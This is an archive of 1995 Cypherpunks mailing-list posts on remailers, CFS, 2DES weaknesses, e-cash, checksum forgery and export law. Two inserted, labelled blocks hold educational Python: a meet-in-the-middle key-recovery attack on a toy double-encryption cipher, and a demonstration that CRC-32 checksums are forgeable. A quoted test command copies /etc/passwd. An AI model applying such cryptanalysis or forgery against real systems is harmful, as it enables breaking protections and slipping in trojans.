To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510282018.NAA21600@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



kelso (kelso@netcom.com) suggested:
[Let's split the message, get both parts independently to the
end-recipient and let him sort it out]

Thomas Grant Edwards (tedwards@Glue.umd.edu) continued:
[Well, let's just get it there still encrypted]

I'll continue in this direction:

My understanding is that it is a Good Thing for the last stage remailer
to be able to claim:  "I received high entropy stuff. There is no way I
could tell what it was. I just forwarded it. I just make sure I do not
forward low entropy stuff."  Furthermore, it would help everybody if
end-recipients were somehow able to signal whether they are or are not
willing to read clearly anonymous material (and are suckers for
pseudonyms :-)

The problem is that it is currently the last stage's responsibility
to decipher most messages, and it is very difficult (at best) to go
back and modify all mail and news readers so their user can shield
himself from anonymous stuff.

We could however provide servers that make it "Very Easy" or at least
easier for the end-recipient to make sense of split or still encrypted
email messages:

(In broad lines, depending on the remailer type.)
The end-recipient may receive one encrypted message, or k split parts of
a message that say, prominently at the top (in the message body so that
braindead mail readers show it to their users):

"If you are the end-recipient for this email message, you can get it
decrypted by forwarding it as is to a Handyserver such as
handyserver@well.known.site.  Don't worry about formats, the server
knows what to do. If you received several such messages, forward all of
them one by one or together. They may all be parts of one message. The
server remembers parts for a week, while waiting for more parts, and
will respond when done."

Now, we need a way for this to work for the end-recipient but not for
the last stage remailer. How about the message sender sending, through
the remailer network, to the Handyserver (How about Johnnyserv as
another possible name :-), the decryption key, the end-recipient email
address and name, and the first few bytes of the encrypted messages.
The Handyserver authenticates service requests with some heuristic
based on name and email, and knows which key to apply based on the
message's first few bytes. That's extremely weak authentication but it
usually takes no effort by the end-recipient and the last stage
remailer can now say "I cannot attempt to get all my traffic through
Handyservers. Not only would it be very time consuming, but I would
have to illegally forge the recipient's address and the Handyserver
would forward the decrypted version directly to the end-recipient
anyway." The Handyserv can also keep a list of tokens publicly posted
for the sender to be able to confirm whether his message was or was not
decrypted (that's an acknowledgement for a successful transmission
through the remailer system, too.)

In summary, the Handyserver provides a "mild" function: Its logs could
permit the identification of the last stage remailer, but so what, the
end-recipient had this info already. The last stage remailer now is
safer.  And the end-recipient has to choose and voluntarily get the
message decrypted.

That could take care of email. Maybe something similar is possible for
news (more or less the way rot13 worked, way back then, in the good old
times when it was deemed sufficient to protect sensitivities.)

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sun, 29 Oct 1995 06:11:06 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510282012.NAA25772@infinity.c2.org>
Message-ID: <9510282131.AA11388@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 28 Oct 1995 13:12:08 -0700 (PDT)
   X-Authentication-Warning: infinity.c2.org: remail set sender to nobody using -f
   From: Anonymous User <nobody@c2.org>
   Complaints-To: remailer-owner <remail-owner@c2.org>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   >For reference, the title of the book is "PGP: Source Code and
   >Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
   >the MIT Press pages from my keyserver home page
   >(http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
   >Press's site (http://www-mitpress.mit.edu/) and look under
   >Books/Computer Science.  Orders accepted over the net using either HTML
   >forms (SSL) or e-mail (PGP).

   It's worth 60 bucks because the book has the old version without the
   weakness in it. They are probably assuming that people will look at the
   book instead of the ftp source code and then get lazy and compile the
   code off the ftp instead of typing or scanning the book.

This is blatantly false and an obvious troll.  The book contains a copy
of the source code for MIT PGP 2.6.2, the same version currently being
distributed by MIT.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 29 Oct 1995 08:07:10 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282012.NAA25761@infinity.c2.org>
Message-ID: <199510282357.XAA09892@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
> >
> >What happens to hard links?
> >
> >mkdir foo bar
> >CFS_set_directory_key -directory ./foo -key foo-key
> >CFS_set_directory_key -directory ./bar -key bar-key
> >cp /etc/passwd ./foo/test1
> >ln ./foo/footest ./bar/bartest
> >cmp ./foo/footest ./bar/bartest
> 
> This is a serious flaw. The emperor has no clothes. People should
> sue at&t for this shit.

I'm not sure why I'm bothering to respond to this, but I'd hate to
think someone might take the above message seriously and think that
there's some kind of "serious flaw" in CFS demonstrated by this sequence
of (hypothetical, incorrect) commands.  So here goes:

What on earth are you talking about?

As I pointed out in a previous message, that's not how CFS works - you
can't link across encrypted directories.

There may be (and probably are) bugs in or attacks against CFS, but this
isn't one of them.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:36:02 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
Message-ID: <199510290023.UAA12614@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510261603.AA26221@zorch.w3.org>,  <hallam@w3.org> wrote:
> 
> 3DES with only two independent keys is only slightly more secure than
> DES, consider a variant of the meet in the middle attack exploiting 
> the fact that the constraint network is reducible to two equations
> in one unknown.
> 

Huh?  Are you sure you're not thinking of 2DES?

2DES is known to be not much more secure than DES: 2DES can be broken
with 2^56 operations and 2^56 space.  (The space requirements can be
eliminated without too much extra cost in time.)

Could you post a reference for your claim that 2-key 3DES is insecure?
Or post an attack?  Or anything?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLJdSoZzwIn1bdtAQFFRQGAgPceMs6vYCq4nGQQ5QT9tOLIgiGAoY8M
B71KIQDP75TMiF1rgvorSWQsNZjzjhbm
=3bH5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:46:40 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510270413.VAA29718@ix7.ix.netcom.com>
Message-ID: <199510290028.UAA12628@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510270413.VAA29718@ix7.ix.netcom.com>,
John Lull <lull@acm.org> wrote:
> 
> Even for 2DES, or for 3-key 3DES, doesn't a meet in the middle attack
> require on the order of 2^56 words of memory?
> 

Actually, as it turns out, van Oorschot & Wiener have a recent paper
which describes how to break 2DES without the huge space requirements
without sacrificing too much time (by using their parallel collision
search method).  They estimated the cost to break 2DES via specialized
hardware, and decided that breaking 2DES was only about 2^14 times as
costly as breaking DES.

The conclusion to take away from this is simple: double encryption
doesn't give you much extra security over single encryption.  Don't
use double encryption.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLKmSoZzwIn1bdtAQEk5gF/VtAgBNgB6o8SrTWSSMaciikdzoVCIqYF
JdXxs4pWt6ueY8WVsSEj5yU5EKAT0/4M
=6YNF
-----END PGP SIGNATURE-----
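Added example, not part of either message above or of the van Oorschot & Wiener paper: the table-based meet-in-the-middle attack behind the "2^56 operations and 2^56 space" figure, run against double encryption with a toy 16-bit Feistel cipher so that it finishes in about a second. The cipher, its S-box, its round constants and the sample keys are all assumptions made for this sketch, and the code keeps the full table rather than using the parallel collision search method.

```python
from collections import defaultdict

KEY_BITS = 16    # toy key size (assumption); single DES would be 56
ROUNDS = 6
# Toy 8-bit S-box (assumption): x -> x^3 mod 257 permutes 1..256.
SBOX = [pow(i + 1, 3, 257) - 1 for i in range(256)]
ROUND_CONST = [0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D]


def _round_key(key, i):
    """Alternate the two key bytes and mix in a per-round constant."""
    half = (key >> 8) if i % 2 == 0 else (key & 0xFF)
    return half ^ ROUND_CONST[i]


def encrypt(block, key):
    """Toy Feistel cipher: 16-bit block, 16-bit key."""
    left, right = block >> 8, block & 0xFF
    for i in range(ROUNDS):
        left, right = right, left ^ SBOX[right ^ _round_key(key, i)]
    return (left << 8) | right


def decrypt(block, key):
    """Inverse of encrypt(): run the rounds backwards."""
    left, right = block >> 8, block & 0xFF
    for i in reversed(range(ROUNDS)):
        left, right = right ^ SBOX[left ^ _round_key(key, i)], left
    return (left << 8) | right


def double_encrypt(block, k1, k2):
    """The "2DES" construction: two independent keys, applied in sequence."""
    return encrypt(encrypt(block, k1), k2)


def known_pairs(k1, k2, plaintexts=(0x0123, 0x4567, 0x89AB)):
    """Constructed known-plaintext pairs for the demonstration."""
    return [(p, double_encrypt(p, k1, k2)) for p in plaintexts]


def meet_in_the_middle(pairs):
    """Return (candidate key pairs, cipher operations spent on the first pair).

    Encrypt the first plaintext under every k1 and store the middle values,
    then decrypt its ciphertext under every k2 and look for a match.  The
    remaining pairs weed out accidental matches.
    """
    (p0, c0), rest = pairs[0], pairs[1:]
    ops = 0
    table = defaultdict(list)            # middle value -> list of k1
    for k1 in range(1 << KEY_BITS):
        table[encrypt(p0, k1)].append(k1)
        ops += 1
    candidates = []
    for k2 in range(1 << KEY_BITS):
        middle = decrypt(c0, k2)
        ops += 1
        for k1 in table.get(middle, ()):
            if all(double_encrypt(p, k1, k2) == c for p, c in rest):
                candidates.append((k1, k2))
    return candidates, ops


if __name__ == "__main__":
    secret = (0xBEEF, 0x1234)            # constructed sample keys
    found, ops = meet_in_the_middle(known_pairs(*secret))
    print("recovered key pairs:", [(hex(a), hex(b)) for a, b in found])
    print("cipher operations on first pair:", ops)
    print("exhaustive search over both keys:", 1 << (2 * KEY_BITS))
```

The work is 2 * 2^16 cipher operations plus a 2^16-entry table instead of 2^32 trial double encryptions, the same ratio as 2^57 against 2^112 for DES-sized keys.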




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <199510290031.UAA12653@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510272049.NAA29753@netcom7.netcom.com>,
Vladimir Z. Nuri <vznuri@netcom.com> wrote:
> 
> if this is true, I wanted to point out in my post that this is a property
> that real cash does not have. you cannot ever say to your bank from which
> you withdrew cash, "oops, I lost a piece, could you replace it? also, if
> someone spends the piece that I lost, tell them they can't?"
       [...]
> or, the bank might say, "oh, well, that cash was not spent yet. we can issue
> a replacement and bar the cash from being spent". this idea of "replacing"
> cash is of course unique to the electronic realm. if the bank does it,
> the consumer would be required to notify the bank before the cash is 
> spent, again another unusual property unique to e-cash.
> 

Hrmm, is this really unique to e-cash?  It sounds pretty similar to
traveller's checks.

(I do like your suggestion that e-cash service providers should write
a FAQ listing all the properties of their ``cash''!)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLLRCoZzwIn1bdtAQE2cwGAzWzY/2tqwjLpMSEr210r607j5mxUskJT
3L8qyQOCTMLjrZWfAwmQZ28yAszojBm+
=23AU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 29 Oct 1995 10:53:48 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282012.NAA25761@infinity.c2.org>
Message-ID: <46upi0$53c@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous User <nobody@c2.org> writes:

>This is a serious flaw. The emperor has no clothes. People should
>sue at&t for this shit.

This is one of those times that I don't see much use for anonymity...
-- 
` . . . I'm a sysadmin, with an admitted preference for things I can
reboot over things I have to negotiate with . . . '
		Mike Shaver (shaver@neon.ingenia.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 29 Oct 1995 16:03:19 +0800
To: cypherpunks@toad.com
Subject: Conference in Eugene, OR - 11/3 and 11/4
Message-ID: <199510290728.AA06911@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

One of the professors at the U of Oregon School of Law here in Eugene,
Keith Aoki, has put together what looks like a pretty good conference.
As far as I can tell, it's going to be something of a sleeper - lots of
good speakers, and probably not very many people in the audience who'll
be able to appreciate what they're seeing. Folks on the west coast 
interested in law and technology policy might do well to pop up to Eugene
for the weekend.

I've got limited floor space for people who need a place to crash and 
don't want to pony up the $ for a place in Eugene. (I'm in Springfield,
the redneck town across I-5 from Eugene - I'm about 15 mins from campus
by car, and can give folks a ride over if they're willing to stay for
the day.) Motel rooms ought to run between $30 and $80 per night in
Eugene, depending on whether or not knife marks on the headboard and the
smell of old cigarettes bothers you. :) 

Eugene is 2 hours (~ 110 miles) south of Portland on I-5 and 8 or 9
hours north of the Bay Area by car, up I-5. There's an airport here, so
it's possible to fly in - some rocket scientist planners put the airport
way north and west of anything interesting in town, though. 

The conference is Friday, November 3, and Saturday, November 4. Speakers
include (in no special order): 

John Perry Barlow
James Boyle
Rosemary Coombe
Steven Winter
Rudy Rucker
Tim Sloan
A. Michael Froomkin
Marc Rotenberg
Lee Tien
Cait Clarke
Gary Glisson
Rex Heinke
Eric Hughes
Matthew Ghourdjian
Benjamin Kaminash
Barry Schrader
Vibeke Sorenson
Dhruv Khann
Jerry Kang
Peter Jaszi
Jessica Litman
David Peterson
Brian Stine
Alfred Yen
Richard Stallman
James Love
Pamela Samuelson
Jerry Berman
Shari Steele
E. Wally Van Valkenburg
Margaret Chon

Folks who want to stay with me (you should be at least dog-tolerant)
or who want help getting picked up at the airport/finding a motel/whatever
are welcome to give me a call (503 744 2713) or send E-mail.

I think there's some charge to get in (not for law students, so I haven't
been especially attentive to it) but Keith said that we can probably waive
that if folks are interested and can't pay. If that sounds like a problem,
send mail, and I'll see if I can get him to issue some Cypherpunk passes.
(The idea is to extract $ from working attorneys without scaring away 
interested non-attorneys.) 

It ought to be quite a conference. By all means, if you can make it, 
come on up (or down). 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJMtEH3YhjZY3fMNAQHSBQP/R4OdjIQIYbpcR0sloIBc+ZVeR8hzQ81w
c8o2NyKncO0P/Hthxx+peCAUwN2S7RJr8k/jNvY0ah5Qcy4lmPnhn3uBVZFeY9O4
7I+NPimj38xNjvYdnUYrQT1HuEyVknnwi1s/2VsSGCVvbfJkHOWkuc0nR8JCX1cI
sc5GsGR2zzk=
=W/r5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sun, 29 Oct 1995 22:58:26 +0800
To: hfinney@shell.portal.com
Subject: Re:  Human ID through insecure channel
Message-ID: <9510291444.AA24504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 16 Oct 1995 13:51:27 -0700
>From: Hal <hfinney@shell.portal.com>
>Subject: Human ID through insecure channel
>
>Here is an example of the Matsumoto/Imai scheme for identifying yourself
>via a shared secret over an insecure channel, a system which is simple
>enough to be done in your head but which can withstand repeated
>observations by an adversary without being broken.


Hal,

	has this been written up someplace where I might read their
description?

	From your description of it, I have a way to break it in O(N)
samples, where N is the number of characters in the challenge string and
the factor of proportionality is strictly a function of how sure you want
to be that you have a correct break.


 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme          |
 |Trusted Information Systems, Inc.   http://www.tis.com/                   |
 |3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
 |Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
 +--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 30 Oct 1995 00:01:40 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282357.XAA09892@crypto.com>
Message-ID: <m0t9Zs9-0001PkC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze enscribed thusly:
> 
> Anonymous writes:
> > >
> > >What happens to hard links?
> > >
> > >mkdir foo bar
> > >CFS_set_directory_key -directory ./foo -key foo-key
> > >CFS_set_directory_key -directory ./bar -key bar-key
> > >cp /etc/passwd ./foo/test1
> > >ln ./foo/footest ./bar/bartest
> > >cmp ./foo/footest ./bar/bartest
> > 
> > This is a serious flaw. The emperor has no clothes. People should
> > sue at&t for this shit.

	"Sue AT&T..."  For free, unsupported software?  In a remark
from a coward hiding behind an anonymous remailer.  For a problem
that is all in his own mind!

	Give Me A Break!

> I'm not sure why I'm bothering to respond to this, but I'd hate to
> think someone might take the above message seriously and think that
> there's some kind of "serious flaw" in CFS demonstrated by this sequence
> of (hypothetical, incorrect) commands.  So here goes:

	Matt, you're responding to an anonymous twit spouting ignorant
ravings because if you didn't, some others would think this guy had something
significant to say.  It's a sad state of affairs when someone creates a
great package like CFS and then has to deal with an annoyance like this.

> What on earth are you talking about?

	You think he knows?  You give him a lot more credit than I would!

> As I pointed out in a previous message, that's not how CFS works - you
> can't link across encrypted directories.
> 
> There may be (and probably are) bugs in or attacks against CFS, but this
> isn't one of them.

	To quote one of Garry Trudeau's characters from "Doonesbury" -
"Look!  The clothes have no Emperor!"

> -matt

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mahesh Prakriya" <prakriya@gradient.cis.upenn.edu>
Date: Mon, 30 Oct 1995 01:01:22 +0800
To: cypherpunks@toad.com
Subject: ques. regd. STT
Message-ID: <199510291631.LAA24817@gradient.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi. A group of us at the U. of Penn. are doing a presentation
on STT. I would like to know if you have any suggestions for us.
 
I've taken a look at the Visa & MS home pages and have a good
amount of information on STT. 
 
I'm esp. interested in finding out about the potential weaknesses
in STT. 

thanks,
Mahesh

+-----------------------------------------------------------------------+
Work					Home
-------					-----
1717 Arch St., 3E4			1801 JFK Blvd., #512
Phila., PA 19103			Phila., PA 19103
(215)-466-5476				(215)-567-2006

Internet:	prakriya@gradient.cis.upenn.edu
		http://www.cis.upenn.edu/~prakriya/home.html

PGP fingerprint =  6A EC 5B F3 D4 33 F6 D1  4C DA 99 11 F9 D9 89 A7
+-----------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Mon, 30 Oct 1995 03:53:13 +0800
To: cypherpunks@toad.com
Subject: Austin E-Commerce Conf -- BOF?
Message-ID: <v03003803acb98456fdbf@[198.93.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


If there are any other cypherpunks-readers attending the e-commerce
conference in Austin on Monday and Tuesday, it might be fun to get
together for an impromptu BOF either at lunchtime or later in the
evening.

Email me if there is interest.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 07:24:03 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510292300.PAA22971@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM 10/27/95 -0400, "Josh M. Osborne" <stripes@va.pubnix.com> wrote:
> They may help spread the word about
>how foolish the ITAR is, and that is their only real value (well
>aside from entertainment).

US News & World Report, October 16, 1995, page 28, has a short
article on the shirt in their Washington Whispers column :-)
It's not totally accurate, but it talks about how the Feds oppose
export of "simple but powerful computer programs that can be used
to encrypt electronic communications.  Computer buffs and private
security experts say such restrictions are a threat to privacy -
as well as an absurd anachronism, since the programs are already
widely available.  To underscore the point, one disgruntled citizen
is now offering for sale over the Internet
(http://colossus.net/wepinsto/wshome.html) a T-shirt emblazoned with an
encryption program known as RSA" and a bit more about the shirt and issues
(and Don's refund offer to anyone arrested for wearing it)


>However I think it is a good idea to slowly approach the dividing
>line between exportable and non-exportable.  Wouldn't it be nice
>to be able to hold up the shirt and say "this is exportable", and
>then scan it & save it onto a floppy and then say "this is not"
>(assuming that a floppy of the shirt is denied CJ) when arguing
>with someone about how arbitrary the export laws are?

Obviously the next revision of the shirt should have a pocket for
the optional non-exportable floppy disk :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 07:24:14 +0800
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <199510292300.PAA22989@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 PM 10/20/95 +0100, "Rev. Mark Grant" <mark@unicorn.com> wrote:
>> "You have a piece of mail awaiting at our mail delivery service. The
>> originator is unknown. The title of the message is "Tentacles of Medusa
>> Must Die!" You may retrieve this message by replying to this notification
>> with the word "Yes" anywhere in the Subject field. This message will be
>> kept for 60 days and then deleted."
>
>I suspect that I could easily hack this into Mixmaster in a day or two,
>but wouldn't it open you to attacks where Anonymous Fed, say, sends
>terrorist kiddy-porn through your remailer and busts your ISP during those
>60 days for possession ? I'm not sure if it would be better or worse than
>current setups from that point of view. 

One way to deflect this attack is to encrypt the message for storage
using a symmetric-key algorithm with a randomly generated session key,
and send the session key to the recipient with the notification.
You still have 300 MB of planted kiddy-terrorist narcopornography on your
machine, but it's encrypted and you can happily tell the judge that you _can't_
decrypt it because you don't have the key.  The Feds _could_ get the
keys by eavesdropping on your outgoing correspondence or using
your system to send the material to themselves (or a conveniently employed
child), but at least you're not storing it in plaintext.

More of a problem with this system is that it's only useful for terminal
remailers; to use it in the middle of a chain, the next remailer would
need to be configured to auto-accept such messages, or else your remailer
would need to have a list of known remailers and use direct delivery
for all mail sent to them.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 30 Oct 1995 07:46:31 +0800
To: "cypherpunks@toad.com>
Subject: Quebec Libre
Message-ID: <199510292336.PAA31401@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Cpunx, especially offshore banking "fonts of wisdom,"

A friend asks:

> Concerning Quebec Libre, I would love to establish residence there before
> the separation (not necessarily physical residence). Have these fonts of
> wisdom on St. Louis and Anguilla banking anything on getting Quebec
> residency, mail services, and bank accounts?

Any plans if Quebec secedes?

Kent
--
"Put pages for your business on the World Wide Web,  just $5 per month!" --
J. Kent Hastings --  zeus@pinsight.com -- http://www.pinsight.com/~zeus/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 08:48:02 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <199510300037.QAA08347@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue. 

There was a program that forged CRC checksums that came out a couple years
back, letting you create a Trojan Horse and modify it to match Unix "sum"
checksums by adding junk to the end.  I'd be extremely surprised if anyone
did this with MD5; CRCs are invertible, and generally short enough to
brute-force as well.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
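Added example, not part of the message above: the property behind "CRCs are invertible" is that a CRC is an affine function of the message bits, so the effect of an edit on the checksum can be computed without knowing the rest of the file, which does not hold for MD5. The sample byte strings are constructed for the illustration, and zlib's CRC-32 stands in for the CRC family (Unix "sum" uses a different, 16-bit checksum).

```python
import hashlib
import zlib


def sample(label, length):
    """Deterministic constructed test data (SHA-256 of label and counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(f"{label}:{counter}".encode()).digest()
        counter += 1
    return out[:length]


def xor_bytes(*chunks):
    """XOR any number of equal-length byte strings together."""
    out = bytearray(len(chunks[0]))
    for chunk in chunks:
        if len(chunk) != len(out):
            raise ValueError("all inputs must have the same length")
        for i, byte in enumerate(chunk):
            out[i] ^= byte
    return bytes(out)


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def md5_int(data):
    return int.from_bytes(hashlib.md5(data).digest(), "big")


def is_affine(checksum, a, b, c):
    """True if checksum(a^b^c) == checksum(a) ^ checksum(b) ^ checksum(c)."""
    return checksum(xor_bytes(a, b, c)) == checksum(a) ^ checksum(b) ^ checksum(c)


def edit_effect(checksum, message, delta):
    """How the checksum changes when `delta` is XORed into `message`."""
    return checksum(message) ^ checksum(xor_bytes(message, delta))


def compare(length=4096):
    """Run both checks over constructed data for CRC-32 and for MD5."""
    a, b, c = (sample(name, length) for name in ("file-a", "file-b", "file-c"))
    delta = sample("edit", length)
    results = {}
    for name, fn in (("crc32", crc32), ("md5", md5_int)):
        results[name] = {
            "affine": is_affine(fn, a, b, c),
            # Same edit applied to two unrelated files: same checksum change?
            "edit_effect_independent_of_file":
                edit_effect(fn, a, delta) == edit_effect(fn, b, delta),
        }
    return results


if __name__ == "__main__":
    for name, outcome in compare().items():
        print(name, outcome)
```

For release verification this means a matching CRC says nothing about tampering; compare a cryptographic digest obtained over a separate trusted channel instead.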





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Mon, 30 Oct 1995 10:51:10 +0800
To: cypherpunks@toad.com
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <199510300240.SAA07345@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


"Tom Bell" <BELL@odo.law.udayton.edu> wrote:

>The 9/28/95 Congressional Report states that Senators Hatch and Leahy 
>have introduced a bill to amend the Copyright Act in accord with the 
>suggestions of the recent White Paper on the National Information 
>Infrastructure.  In relevant part, S. 1284:  1) makes transmission of copies a 
>type of publication (and thus potentially a means of infringing a 
>copyright); and 2) prohibits the importation, manufacture, or 
>distribution of any device the primary purpose of which is to 
>deactivate any technological protections that prevent or inhibit the 
>violation of copyrights.

What occurs to me is that PGP could be considered a "device" to obscure contents of data, thereby preventing the determination of a copyright violation.



(deletia)


>
>Tom W. Bell
>Assistant Professor 
>Law and Technology Program
>UD Law School
>bell@odo.law.udayton.edu
>
>PGP fingerprint:
>78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Mon, 30 Oct 1995 01:06:22 +0800
To: mab@crypto.com>
Subject: RE: Hash collisions [was Re: MD5 weaknes
In-Reply-To: <1995Oct25.093455.1151.341098@smtpgate.cmp.com>
Message-ID: <MAPI.Id.0016.00617269204c61694244433830304339@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain




>I have unsubscribed from this mailing list. Please remove my name 
>from   
>your personal address lists. Thanks.
>ahg3

Sir,

Your tactics to get rid of a mailing list 
are causing at least me and probably some
others a pain. To be a pain is not the 
right tactic to get rid of a list 
because you might be treated as a pain.
Hmm, which would get you removed from
the list...

Anyway be nice to this person and
get rid of him.

Kari





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 30 Oct 1995 09:19:02 +0800
To: "J. Kent Hastings" <zeus@pinsight.com>
Subject: [noise] Re: Quebec Libre
In-Reply-To: <199510292336.PAA31401@chico.pinsight.com>
Message-ID: <Pine.3.89.9510291907.A27468-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 29 Oct 1995, J. Kent Hastings wrote:

> -- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --
> 
> Cpunx, especially offshore banking "fonts of wisdom,"
> A friend asks:
> > Concerning Quebec Libre, I would love to establish residence there before the
> > separation (not necessarily physical residence). Have these fonts of wisdom
